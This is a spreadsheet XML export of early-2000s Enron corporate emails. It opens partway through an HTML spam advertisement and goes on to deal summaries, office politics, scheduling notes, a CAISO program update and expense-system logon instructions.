 &lt;p align="CENTER"&gt;&lt;font face="Arial" size="2" color="#000080"&gt;&lt;strong&gt;(As_x000D_
 if you need any more reasons to dump your cable_x000D_
 company)&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;_x000D_
 &lt;p align="CENTER"&gt;&lt;font face="Arial" size="2"&gt;&lt;strong&gt;In_x000D_
 short:&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;_x000D_
 &lt;p align="CENTER"&gt;&lt;font face="Arial" size="2" color="#000080"&gt;&lt;strong&gt;FREE_x000D_
 EQUIPMENT  FREE INSTALLATION&lt;br&gt;_x000D_
 FREE 1st MONTH's SERVICE  FREE Shipping and_x000D_
 Handling!!&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;_x000D_
 &lt;p align="CENTER"&gt;&lt;a href="http://www.m-ul.com/e/c.cgi?j=20011122_70&amp;e=1736394363&amp;r=u251&amp;d=6&amp;p=2"&gt;&lt;font_x000D_
 face="Arial" size="2"&gt;&lt;strong&gt;Click here to see if FREE PROFESSIONAL INSTALLATION_x000D_
 is available in your area. &lt;/strong&gt;&lt;/font&gt;&lt;/a&gt;&lt;/p&gt;_x000D_
 &lt;p align="CENTER"&gt;&lt;font face="Arial" size="2" color="#000080"&gt;&lt;strong&gt;Please_x000D_
 click the above link NOW!&lt;/strong&gt;&lt;/font&gt;_x000D_
 &lt;/td&gt;_x000D_
 &lt;/tr&gt;_x000D_
 &lt;/table&gt;_x000D_
 &lt;/td&gt;_x000D_
 &lt;/tr&gt;_x000D_
 &lt;/table&gt;_x000D_
 &lt;/td&gt;_x000D_
 &lt;/tr&gt;_x000D_
 &lt;/table&gt;_x000D_
 &lt;/td&gt;_x000D_
 &lt;/tr&gt;_x000D_
 &lt;/table&gt;_x000D_
 &lt;/td&gt;_x000D_
 &lt;/tr&gt;_x000D_
&lt;/table&gt;&lt;/center&gt;_x000D_
&lt;img height="1" width="1" src="http://www.m-ul.com/e/e_open.cgi?j=20011122_70&amp;mail_id=1736394363"&gt;&lt;/body&gt;_x000D_
&lt;/html&gt;</t>
  </si>
  <si>
    <t>Mon, 30 Apr 2001 14:29:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Stranger:_x000D_
Any interest in getting a drink or dinner Tuesday?  havent seen you in _x000D_
forever.</t>
  </si>
  <si>
    <t>Mon, 28 Aug 2000 09:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Scheduling and Wine Tasting</t>
  </si>
  <si>
    <t xml:space="preserve">It is $43.  If you want to go and can fit it into your "rug budget", call _x000D_
Scott at 524-3397 and he can sign you up!  Mary_x000D_
_x000D_
_x000D_
_x000D_
	Tana Jones_x000D_
	08/28/2000 10:43 AM_x000D_
		_x000D_
		 To: Mary Cook/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Re: Scheduling and Wine Tasting_x000D_
_x000D_
The wine tasting sounds great!   I haven't been to one in awhile.  It's _x000D_
always good to see Hollis too.  Keep me posted..._x000D_
_x000D_
_x000D_
_x000D_
	Mary Cook_x000D_
	08/28/2000 09:30 AM_x000D_
		 _x000D_
		 To: Mark Taylor/HOU/ECT@ECT, Tana Jones/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Scheduling and Wine Tasting_x000D_
_x000D_
First,  Scott is having a wine tasting (Australian) this Wednesday at _x000D_
Galleria Ruggles.  I don't yet know the cost, but thought one or both of you _x000D_
might be interested in coming.  I am going this time, and I think Hollis is _x000D_
too.  Might be fun.  It is not a full dinner, just wines and appetizer type _x000D_
stuff._x000D_
_x000D_
Second;  Mark_x000D_
_x000D_
Most Fridays I will need to pick up William from after care at school, _x000D_
requiring about a 5:30 departure for me.  Scott plans to oridnarily pick up _x000D_
every other day of the week.  If I have a big project etc. I will come back _x000D_
in with William.  However, I realize you generally want people available _x000D_
until 6 each day.  Hopefully, this will not cause too much trouble.  Mary_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 22 Feb 2000 23:26:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Calpine deal summary</t>
  </si>
  <si>
    <t xml:space="preserve">Ben,_x000D_
_x000D_
Could you forward to me name and phone number of EE&amp;CC person who you are _x000D_
contacting to get VOM? I will give it to Thomas in case he wants to give him _x000D_
a call. Thanks. Jin_x000D_
_x000D_
---------------------- Forwarded by Jinsung Myung/Corp/Enron on 02/23/2000 _x000D_
07:22 AM ---------------------------_x000D_
_x000D_
_x000D_
Jinsung Myung_x000D_
02/22/2000 07:31 PM_x000D_
To: Thomas M Suffield/Corp/Enron@Enron_x000D_
cc: Benjamin Rogers/HOU/ECT@ECT _x000D_
_x000D_
Subject: Calpine deal summary_x000D_
_x000D_
Thomas,_x000D_
_x000D_
Here is a Calpine deal summary. _x000D_
_x000D_
ENA would sell four LM-6000 turbines to Calpine._x000D_
Calpine would be responsible for permitting, constructing, financing and _x000D_
operating the peaking power plant in Eastern PJM._x000D_
ENA would enter into a short-terrm tolling agreement to buy power from _x000D_
Calpine for 3 or 5 years._x000D_
Work needed to be done :_x000D_
 - getting VOM for LM-6000 from EE&amp;CC._x000D_
 - getting flat capacity payment ($/kw-mo period) for 3 and 5 years from _x000D_
Structuring group, based on VOM, Heat rate, dispatch, and location of the _x000D_
plant._x000D_
 - building 20 year economic model to understand Calpine position. _x000D_
_x000D_
Profit generator: We buy power from Calpine at lower price than that of ENA _x000D_
bid curve._x000D_
_x000D_
I think it will be helpful if Thomas call EE&amp;CC to get VOM ASAP, so that we _x000D_
can talk to Structuring group. Please review and let me know if it makes _x000D_
sense, and then I will send you, Scott, Richard Park, and Tom Swank._x000D_
_x000D_
If someone needs to have just Eastern PJM curve, we can try to get from _x000D_
Structuring group tomorrow. Richard Park told me about PJM curve but I am not _x000D_
sure what exactly this is for. Thank you._x000D_
_x000D_
Jinsung Myung_x000D_
(Ext: 37330)_x000D_
</t>
  </si>
  <si>
    <t>Wed, 12 Sep 2001 15:51:55 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'theresa.staab@enron.com', 'gerald.nemec@enron.com', 'ellen.wallumrod@enron.com', 'stacey.richardson@enron.com'})</t>
  </si>
  <si>
    <t>September Confirmations</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
 Ellen attached are Confirms for September._x000D_
_x000D_
        _x000D_
_x000D_
Debra Perlingiere_x000D_
Enron North America Legal_x000D_
1400 Smith Street, EB 3885_x000D_
Houston, Texas 77002_x000D_
dperlin@enron_x000D_
713-853-7658_x000D_
713-646-3490 Fax_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 5 Jun 2001 02:38:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: One view from DC</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Rick,_x000D_
_x000D_
I don't know.   Steve never did call that afternoon to discuss the leadership _x000D_
issue.  (My comment to him will be that I would welcome him stepping into a _x000D_
leadership role on these issues, but that he needs to step up to the plate.  _x000D_
This means being able to do Hill meetings on his own, being willing to step _x000D_
back and re-evaluate our strategies from time to time, and looking beyond _x000D_
Scott for policy and technical guidance)._x000D_
_x000D_
I'm also planning to make some general comments to the group as a whole at _x000D_
our EBS GA meeting in Colorado next week.  I think I need to talk about _x000D_
individual versus group efforts.  The issues circling in my mind at the _x000D_
moment are:_x000D_
_x000D_
People need to realize that individual success does not happen independently _x000D_
of the success of our group as a whole._x000D_
This means that every person in our group needs to be able and willing to _x000D_
work constructively will every other individual in our group.  No exceptions._x000D_
Decisions about who attends meetings, whether with the FCC, Congressional _x000D_
members and staff, or EBS executives will be determined according to  the _x000D_
nature and purpose of the meeting.  That means that sometimes I step aside _x000D_
for you or Linda or Steve Kean, and that sometimes one person in my group _x000D_
steps aside for another.  Individual success in not measured by the meetings _x000D_
that you attend.  It's measured by our effectiveness in achieving our agenda._x000D_
 Anything else you can suggest that will help make clear to people that they _x000D_
are focusing on the wrong issues and that this will have a serious negative _x000D_
impact on their performance reviews._x000D_
_x000D_
I really would like to get beyond this point as quickly as possible.  Please _x000D_
let me know if you ever think I'm wasting too much of your time with these _x000D_
petty issues._x000D_
_x000D_
How's London?  Wayne and Zal have had a series of travel complications, so _x000D_
I'm the only one in Argentina so far.  I had a very good day of meetings with _x000D_
our lawyer yesterday.  We've rescheduled meetings with the Argentine _x000D_
regulators for Wednesday afternoon, so that Wayne and Zal will be able to _x000D_
make them.  This means only one day in Sao Paolo and one day in Brasilia, but _x000D_
from all that  I've heard that's not a bad thing._x000D_
_x000D_
Talk to you soon._x000D_
_x000D_
Sue_x000D_
_x000D_
_x000D_
Sue Nord, Sr. Director_x000D_
Government Affairs_x000D_
713 345-4196_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Richard Shapiro_x000D_
	06/04/2001 12:29 PM_x000D_
		_x000D_
		 To: Sue Nord/NA/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: Re: One view from DC_x000D_
_x000D_
What do you do with this?_x000D_
_x000D_
_x000D_
_x000D_
Sue Nord_x000D_
06/01/2001 01:52 PM_x000D_
To: Richard Shapiro/NA/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: One view from DC_x000D_
_x000D_
Sue Nord, Sr. Director_x000D_
Government Affairs_x000D_
713 345-4196_x000D_
_x000D_
----- Forwarded by Sue Nord/NA/Enron on 06/01/2001 01:50 PM -----_x000D_
_x000D_
	Sue Nord_x000D_
	06/01/2001 01:50 PM_x000D_
		_x000D_
		 To: Stephen D Burns/Corp/Enron@ENRON_x000D_
		 cc: _x000D_
		 Subject: Re: EBS Government Affairs Regulatory Report for May 2001_x000D_
_x000D_
Hi Steve,_x000D_
_x000D_
The reason that I've used "DC Office" is that Linda has indicated that she _x000D_
wants to distinguish between your assignments and Allison's assignments.  I'm _x000D_
not sure if she's done this yet and I didn't want to presume anything.  If it _x000D_
works better to list your names individually I am happy to do that.  To be _x000D_
honest, though, I don't think Rick would be likely to interpret this to mean _x000D_
that your role is simply administrative._x000D_
_x000D_
Are you around at the end of the day today?  I have a meeting from 2:00-4:00, _x000D_
but maybe we could talk afterward about the other issues you raise.  Thanks,_x000D_
_x000D_
Sue_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Sue Nord, Sr. Director_x000D_
Government Affairs_x000D_
713 345-4196_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Stephen D Burns_x000D_
	05/31/2001 11:33 AM_x000D_
		 _x000D_
		 To: Sue Nord/NA/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: EBS Government Affairs Regulatory Report for May 2001_x000D_
_x000D_
Hi Sue:_x000D_
_x000D_
This may be a function of the Washington office/EBS Government Affairs _x000D_
differing reporting relationships, but..._x000D_
_x000D_
With the "DC office" appearing only in supporting roles on reports like _x000D_
these, Rick and Steve Kean are going to continue to have the impression that _x000D_
we exist to schedule meetings and execute plans formulated by others.  You _x000D_
know this is a sensitive point for me personally, but beyond that, it is _x000D_
important to my career development that I be seen as taking more of a lead.  _x000D_
I suppose Allison would feel the same way once she becomes more comfortable _x000D_
and familiar with the issues._x000D_
_x000D_
Therefore, two requests.  _x000D_
_x000D_
Would you consider listing Allison and me as individuals, not as "DC Office"?_x000D_
_x000D_
Also -- and here I may be pushing it --  as you and I have discussed a couple _x000D_
of times, am I taking the lead in the cable issue?  What about the BLM _x000D_
issue?  I always appear to Rick and Steve to be supporting Scott on these _x000D_
initiatives.  In my own twisted mind, I think of myself as having more of a _x000D_
leadership role._x000D_
_x000D_
Sorry to continue to be ultra sensitive about this.  But frankly (just _x000D_
between the two of us, please) since we've just brought on 2 new Senior _x000D_
Directors in the past month (knocking me a couple of rungs down the seniority _x000D_
ladder in one fell swoop), I am trying to increase my visibility ... and _x000D_
maybe claim a little more credit for issues that I have before._x000D_
_x000D_
Happy as always to discuss._x000D_
_x000D_
Muchas gracias,_x000D_
Steve_x000D_
_x000D_
_x000D_
----- Forwarded by Stephen D Burns/Corp/Enron on 05/31/2001 10:43 AM -----_x000D_
_x000D_
	Eric Benson_x000D_
	05/30/2001 05:16 PM_x000D_
		 _x000D_
		 To: Scott Bolton/Enron Communications@Enron Communications, Stephen D _x000D_
Burns/Corp/Enron@ENRON, Allison Navin/Corp/Enron@ENRON, Lara _x000D_
Leibman/NA/Enron@Enron, Margo Reyna/NA/Enron@Enron, John _x000D_
Neslage/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Mona L Petrochko/NA/Enron@Enron, _x000D_
Michael Grimes/AP/Enron@Enron, Jan Haizmann/ENRON@EUEnronXGate, Vinio _x000D_
Floris/Corp/Enron@ENRON, Kikumi Kishigami/NA/Enron@Enron_x000D_
		 cc: Sue Nord/NA/Enron@Enron_x000D_
		 Subject: EBS Government Affairs Regulatory Report for May 2001_x000D_
_x000D_
To: Distribution_x000D_
From: Eric Benson_x000D_
_x000D_
Attached for your review and input is the draft EBS Government Affairs Report _x000D_
for May 2001.  Please update the Key Issues  and Strategies/Comments/Next _x000D_
Actions sections of the report and return to my attention at your earliest _x000D_
convenience._x000D_
_x000D_
The report is due to Rick Shapiro by the close of business on the first _x000D_
Friday of each month._x000D_
_x000D_
Please advise of any questions, comments or concerns.  Thank you in advance _x000D_
for your assistance._x000D_
_x000D_
Eric Benson_x000D_
Senior Specialist_x000D_
Enron Government Affairs_x000D_
713-853-1711_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 17 Jan 2002 01:56:24 -0800 (PST)</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 1/17/02; HourAhead hour: 4;  HourAhead schedule download failed. Manual intervention required.</t>
  </si>
  <si>
    <t>Thu, 4 Jan 2001 02:59:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jesus.guerra@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">both. you have to schd. all your trades._x000D_
</t>
  </si>
  <si>
    <t>Mon, 6 Mar 2000 01:04:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'johnsoncb@aol.com'})</t>
  </si>
  <si>
    <t>frozenset({'mhansen@fulbright.com', 'chrissy.citzler@us.pwcglobal.com', 'monica.schafer@us.pwcglobal.com', 'laughingdog@webtv.net', 'roger.bhalla@compaq.com', 'sprenger@mail.utexas.net', 'donna_anderson@aimfunds.com', 'sally.beck@enron.com', 'maumus@tgroup.net'})</t>
  </si>
  <si>
    <t>Houston GBN Steering Committee - Sunday, March 12th</t>
  </si>
  <si>
    <t>This is a reminder that we have a Houston GBN steering committee meeting this_x000D_
Sunday, March 12th, at 4:30 pm at Guadalajara Restaurant on 59 between_x000D_
Buffalo Speedway and Kirby.  Please let myself of Glenn know if you can make_x000D_
it._x000D_
_x000D_
Hopefully, you have received invites or e-mails about the Steve Patterson_x000D_
event on March 15th and the Houston Aeros game with the Texas Exes on March_x000D_
31st._x000D_
_x000D_
Chris</t>
  </si>
  <si>
    <t>Tue, 10 Jul 2001 20:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sarah.novosel@enron.com', 'ray.alvarez@enron.com', 'robert.williams@enron.com', 'alan.comnes@enron.com', 'susan.mara@enron.com', 'linda.robertson@enron.com', 'jeff.dasovich@enron.com', 'james.steffes@enron.com', 'richard.sanders@enron.com', 'asettanni@bracepatt.com', 'jeffrey.hodge@enron.com', 'richard.shapiro@enron.com', 'dwatkiss@bracepatt.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t>Final Comments to Judge Wagner's Recommendation</t>
  </si>
  <si>
    <t xml:space="preserve">Attached below is Dan/Andrea's draft w/ an introductory insert by yours truly (which might be too aggressive in places), and which incorporates comments by Kean, Robertson and Mara.  The next round of input goes to the DC team - Sarah or Ray I assume.  Linda, I'll call you about touching base w/ the litigation team._x000D_
_x000D_
   </t>
  </si>
  <si>
    <t>Fri, 6 Jul 2001 04:48:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Numbers</t>
  </si>
  <si>
    <t>Jeff,_x000D_
_x000D_
I will be at (916) 448-8240, Hedy will be at (916) 761-1462 and Bev will be_x000D_
at (916) 708-1800._x000D_
_x000D_
Scott</t>
  </si>
  <si>
    <t>Wed, 28 Mar 2001 06:30:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dfuller@caiso.com'})</t>
  </si>
  <si>
    <t>Re: CAISO NOTICE: ISO 2001 Demand Program Update</t>
  </si>
  <si>
    <t xml:space="preserve">Mary Hain has resigned her position with Enron.  Please remove her from all _x000D_
your mail lists._x000D_
_x000D_
Thank you._x000D_
_x000D_
Lysa Akin_x000D_
Gov't Affairs - Sr. Admin. Ass't._x000D_
_x000D_
_x000D_
_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  "Grant, Colleen" &lt;CGrant@caiso.com&gt;                           _x000D_
03/23/2001 01:18 PM_x000D_
	_x000D_
_x000D_
Please respond to "Fuller, Don" &lt;DFuller@caiso.com&gt;_x000D_
To: ISO Market Participants _x000D_
&lt;IMCEAEX-_O=CAISO_OU=CORPORATE_CN=DISTRIBUTION+20LISTS_CN=ISO+20MARKET+20PARTI_x000D_
CIPANTS@caiso.com&gt;_x000D_
cc:  _x000D_
Subject: CAISO NOTICE: ISO 2001 Demand Program Update_x000D_
_x000D_
_x000D_
Market Participants:_x000D_
_x000D_
The ISO provides this update regarding the Summer 2001 Demand Relief Program_x000D_
and the Discretionary Load Curtailment Program.  The ISO intends to issue_x000D_
new solicitations for both programs in the next 1 1/2 weeks._x000D_
_x000D_
Two additional RFBs for the Demand Relief Program, one for Loads only and_x000D_
one for Loads with back-up generators, are scheduled for issuance early next_x000D_
week with bids due May 1.  They will be posted to our website and noticed by_x000D_
email.  Based on ISO Governing Board approval on May 10, these Loads will_x000D_
begin participation in the Demand Relief Program on either June 1 or July 1,_x000D_
as feasible._x000D_
_x000D_
The ISO Governing Board recently approved the design structure of the ISO_x000D_
Discretionary Load Curtailment Program.  This program will be operable_x000D_
year-round.  The ISO plans to issue the formal RFP in the next 1 1/2 weeks._x000D_
Proposals will be accepted from aggregators on an ongoing basis._x000D_
_x000D_
Additional details (subject to some change) can be found in Attachment A of_x000D_
the ISO Management Memo to the Governing Board dated March 7, 2001 and_x000D_
titled, Summer 2001 Preparedness Update and Demand Response Programs.  (Note_x000D_
that pricing for the Discretionary Load Curtailment Program could be_x000D_
modified in the final design; the ISO expects to initiate the program in the_x000D_
$250-$500/MWh price range.)_x000D_
_x000D_
Don Fuller_x000D_
Director, Client Relations_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 9 Nov 2001 19:00:48 -0800 (PST)</t>
  </si>
  <si>
    <t>European Gas: The New Negotiating Climate - CERA Conference Call_x000D_
 Playback</t>
  </si>
  <si>
    <t>_x000D_
Title: European Gas: The New Negotiating Climate_x000D_
URL(s):_x000D_
_x000D_
http://www20.cera.com/eprofile?u=35&amp;m=2780;_x000D_
_x000D_
_x000D_
***********************************************************************_x000D_
_x000D_
In a November 6, 2001, CERA conference call and Web Presentation, Simon Blakey_x000D_
and Michael Stoppard discussed_x000D_
_x000D_
*  The outlook for prices and current pressures on prices_x000D_
_x000D_
*  Norwegian gas post-GFU_x000D_
_x000D_
*  The search for spot market liquidity_x000D_
_x000D_
*  Spot prices versus contract prices--the reemerging arbitrage?_x000D_
_x000D_
Please follow the above URL to view and listen to this CERA conference call_x000D_
playback. When the Premiere Conferencing PlaceWare window opens, simply enter_x000D_
your name and click the "View" button. A "recording key code" is not required._x000D_
_x000D_
Hosted by Premiere Conferencing._x000D_
_x000D_
**end**_x000D_
_x000D_
_x000D_
_x000D_
E-mail Category: Conference Call Playback_x000D_
CERA Knowledge Area(s): European Gas_x000D_
_x000D_
_x000D_
***********************************************************************_x000D_
***********************************************************************_x000D_
CERA's Autumn 2001 Roundtable event dates and agendas_x000D_
are now available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Fri, 20 Apr 2001 01:09:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'stephen.bennett@enron.com', 'karin.ahamer@enron.com', 'mike.roberts@enron.com', 'vince.kaminski@enron.com'})</t>
  </si>
  <si>
    <t>Re: Desk Move/Computer Stuff</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks Karin...._x000D_
---------------------- Forwarded by Kevin G Moore/HOU/ECT on 04/20/2001 08:07 _x000D_
AM ---------------------------_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources _x000D_
	Canada Corp. _x000D_
	_x000D_
	From:  Karin Ahamer @ ENRON                           04/20/2001 06:57 AM_x000D_
	_x000D_
_x000D_
To: Kevin G Moore/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Desk Move/Computer Stuff  _x000D_
_x000D_
Kevin_x000D_
_x000D_
Don't worry I haven't forgotten about Stephen.  He will be moved and sit next _x000D_
to Tony.  Don't know what they are talking about loan computers but I am  on _x000D_
the case._x000D_
_x000D_
Regards_x000D_
_x000D_
Karin_x000D_
_x000D_
Avistar has been all set up as far as I know but  someone has to come in _x000D_
again on Monday to re-install it on Tonys new computer._x000D_
_x000D_
_x000D_
_x000D_
Kevin G Moore@ECT_x000D_
20/04/2001 12:27_x000D_
To: Karin Ahamer/EU/Enron@ENRON, Stephen Bennett/NA/Enron@ENRON, Mike A _x000D_
Roberts/HOU/ECT@ECT, Tony Hamilton/EU/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Desk Move/Computer Stuff  _x000D_
_x000D_
Hello Karin ,_x000D_
I noticed that Tony is taken care of , but what about Stephen._x000D_
Tony and Stephen are a team , they work very closely together._x000D_
Stephen also needs to be aware of  what is taking place as well._x000D_
If there is a problem with cost centers please contact me , but_x000D_
please try and have both guys set up for Monday morning._x000D_
_x000D_
                                                              Thanks so much ._x000D_
                                                                Kevin Moore_x000D_
_x000D_
By the way have the Avistar set -up been completed......._x000D_
Please inform..._x000D_
_x000D_
_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources _x000D_
	Canada Corp. _x000D_
	_x000D_
	From:  Karin Ahamer @ ENRON                           04/20/2001 03:00 AM_x000D_
	_x000D_
_x000D_
To: Stephen Bennett/NA/Enron@ENRON, Graham Aley/LON/ECT_x000D_
cc: Tony Hamilton/EU/Enron@Enron, Kevin G Moore/HOU/ECT@ECT _x000D_
Subject: Re: Desk Move/Computer Stuff  _x000D_
_x000D_
Steve_x000D_
_x000D_
I have ordered a computer for Tony which IT should know about.  I believe the _x000D_
contact person is Steve Deakin.  I am in a course all day today but will look _x000D_
into it at lunchtime._x000D_
_x000D_
Regards_x000D_
_x000D_
Karin_x000D_
_x000D_
_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  Stephen Bennett                           19/04/2001 16:53_x000D_
	_x000D_
_x000D_
To: Karin Ahamer/EU/Enron@Enron_x000D_
cc: Tony Hamilton/EU/Enron@Enron, Kevin G Moore/HOU/ECT@ECT _x000D_
_x000D_
Subject: Desk Move/Computer Stuff_x000D_
_x000D_
Hi Karin,_x000D_
_x000D_
I just wanted to check the status of our change in equipment for start of _x000D_
business Monday.  I've been told that Tony and I will be using loaner PC's.  _x000D_
The folks in IT are asking me where that loaner PC is so they can install all _x000D_
of the software that I need.  Slava has told me that you are the point of _x000D_
contact.  I just wanted to check with you to see if you need any additional _x000D_
information from me - or if I can be of help in any way.  Thanks!!_x000D_
_x000D_
Steve_x000D_
_x000D_
Stephen Bennett_x000D_
Senior Meteorologist_x000D_
Enron Research_x000D_
London Temp Ext:  34761_x000D_
Houston:  001 713 345 3661_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 24 Jul 2000 03:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>John Martin, Energy Finance Article</t>
  </si>
  <si>
    <t xml:space="preserve">Vince,_x000D_
_x000D_
F.Y.I.   I have not talked to John Martin about it yet.   I don't know if you _x000D_
have any interest._x000D_
_x000D_
Stinson_x000D_
_x000D_
---------------------- Forwarded by Stinson Gibner/HOU/ECT on 07/24/2000 _x000D_
10:03 AM ---------------------------_x000D_
_x000D_
_x000D_
John Martin &lt;J_Martin@baylor.edu&gt; on 07/21/2000 07:36:31 PM_x000D_
To: Stinson Gibner &lt;Stinson.Gibner@enron.com&gt;_x000D_
cc:  _x000D_
Subject: Re: your call_x000D_
_x000D_
_x000D_
My number is 254-710-4473 (office) and 254-757-0852 (home).  The editor of_x000D_
the Journal of Applied Corporate Finance is doing a special issue on Energy_x000D_
Finance for the Fall and I want to see if you and Vince would like to put_x000D_
something together describing Enron's basic business model.  I would love_x000D_
to join you if you would like and I can actually draft the paper with your_x000D_
help.  I'll get in touch with you on Monday.  Have a great weekend._x000D_
_x000D_
John_x000D_
_x000D_
p.s. Mitch Taylor was in class today and did his usual great job.  I sure_x000D_
enjoy using Enron as my "premier company example"._x000D_
_x000D_
At 04:48 PM 7/20/00 -0500, you wrote:_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;John,_x000D_
&gt;_x000D_
&gt;I misplaced your phone number.   Please let me have it, and I promise to give_x000D_
&gt;you a call.   I'd love to hear what you have in mind._x000D_
&gt;_x000D_
&gt;_x000D_
&gt;Best regards,_x000D_
&gt;_x000D_
&gt;Stinson_x000D_
&gt; _x000D_
</t>
  </si>
  <si>
    <t>Wed, 31 Jan 2001 07:39:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Cal Berkeley</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 01/31/2001 _x000D_
03:42 PM ---------------------------_x000D_
_x000D_
_x000D_
Shirley Crenshaw_x000D_
01/30/2001 03:16 PM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc: Ashley Baxter/Corp/Enron@Enron _x000D_
Subject: Cal Berkeley_x000D_
_x000D_
Vince:_x000D_
_x000D_
Ashley Baxter called and wanted to know if you would be interested in going_x000D_
to Cal Berkeley on Monday and giving an overall Enron presentation on_x000D_
Monday night to a group of about 700 students.  She said they could do it,_x000D_
but thought you might want to._x000D_
_x000D_
Let me or her know._x000D_
_x000D_
Thanks!_x000D_
_x000D_
Shirley_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 24 Sep 2001 14:13:30 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'marcus.nettelton@enron.com', 'genia.fitzgerald@enron.com', 'alice.wright@enron.com'})</t>
  </si>
  <si>
    <t>RE: Arrangements during Genia's absence</t>
  </si>
  <si>
    <t xml:space="preserve">looks great - thanks everybody.  Alice will you send out to group from me.  I'm so busy you see ...._x000D_
_x000D_
_x000D_
Elizabeth Sager_x000D_
713-853-6349_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Fitzgerald, Genia  _x000D_
Sent:	Monday, September 24, 2001 3:02 PM_x000D_
To:	Sager, Elizabeth_x000D_
Cc:	Nettelton, Marcus_x000D_
Subject:	FW: Arrangements during Genia's absence _x000D_
Importance:	High_x000D_
_x000D_
_x000D_
EAS-_x000D_
_x000D_
What would we ever do without Marcus!!!!!_x000D_
_x000D_
gf_x000D_
 -----Original Message-----_x000D_
From: 	Nettelton, Marcus  _x000D_
Sent:	Monday, September 24, 2001 2:36 PM_x000D_
To:	Fitzgerald, Genia_x000D_
Subject:	Arrangements during Genia's absence _x000D_
_x000D_
_x000D_
				_x000D_
As most of you know Genia will be out of the office for a period of approximately 4 weeks from the 4th October. _x000D_
_x000D_
During this period Alice Wright will, in addition to her other responsibilities, be available to assist in the preparation of cover sheets and other aspects of work normally performed by Genia. However, while Alice has spent some time with Genia over the past few weeks gaining an understanding of the preparation of EEI Cover Sheets, this is a new area for her and she will require both our assistance and patience._x000D_
_x000D_
During this period, for example, it is likely that the attorneys will, from time to time, need to complete cover sheets using the credit work sheet and I would encourage all of you to spend some time with Genia to make sure that, if required, you will be able to perform this task. There are clearly other agreements which we all ask Genia to prepare and  any such agreements should be prepared by the attorneys until Genia's return._x000D_
	_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	</t>
  </si>
  <si>
    <t>Mon, 2 Apr 2001 03:25:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Can you do lunch on Thursday?  Just for fun, but to also pick your brain _x000D_
about roses._x000D_
_x000D_
Joannie</t>
  </si>
  <si>
    <t>Sun, 1 Jul 2001 19:11:05 -0700 (PDT)</t>
  </si>
  <si>
    <t>Concur Expense (XMS) Logon Instructions - All XMS Users Please_x000D_
 Read!</t>
  </si>
  <si>
    <t>_x000D_
   Concur Expense (XMS) Goes Live 7/2/2001_x000D_
                                                            Logon Instructions_x000D_
_x000D_
_x000D_
1.	Log into Microsoft Internet Explorer _x000D_
2.   Type expensexms.enron.com in the address bar or click on the following link:_x000D_
&lt;https://expensexms.enron.com&gt;_x000D_
_x000D_
Special Note: The XMS address above is a true internet address.  You can access this address from home using your personal ISP (AOL, Earthlink, etc.)  You are no longer required to dial into Enron to access XMS._x000D_
_x000D_
3.	Enter your 'P' id in the Logon ID field.     Example. P00123456._x000D_
4.   Enter your birth date in the Password field in the following format:_x000D_
YYYMMMDD where MMM is the three character month in _x000D_
ALL CAPS.      Example: 1960JAN01_x000D_
5.	Click the Logon button_x000D_
6.   You will be asked to enter a new password.  Enter your new password using the rules below._x000D_
_x000D_
_x000D_
XMS Password Rules_x000D_
1.  Passwords must be a minimum length of 8 characters long_x000D_
2.  Passwords must be alphanumeric and contain at least one digit or symbol such as   0-9, @, #, etc. and at least one non-digit or non-symbol_x000D_
_x000D_
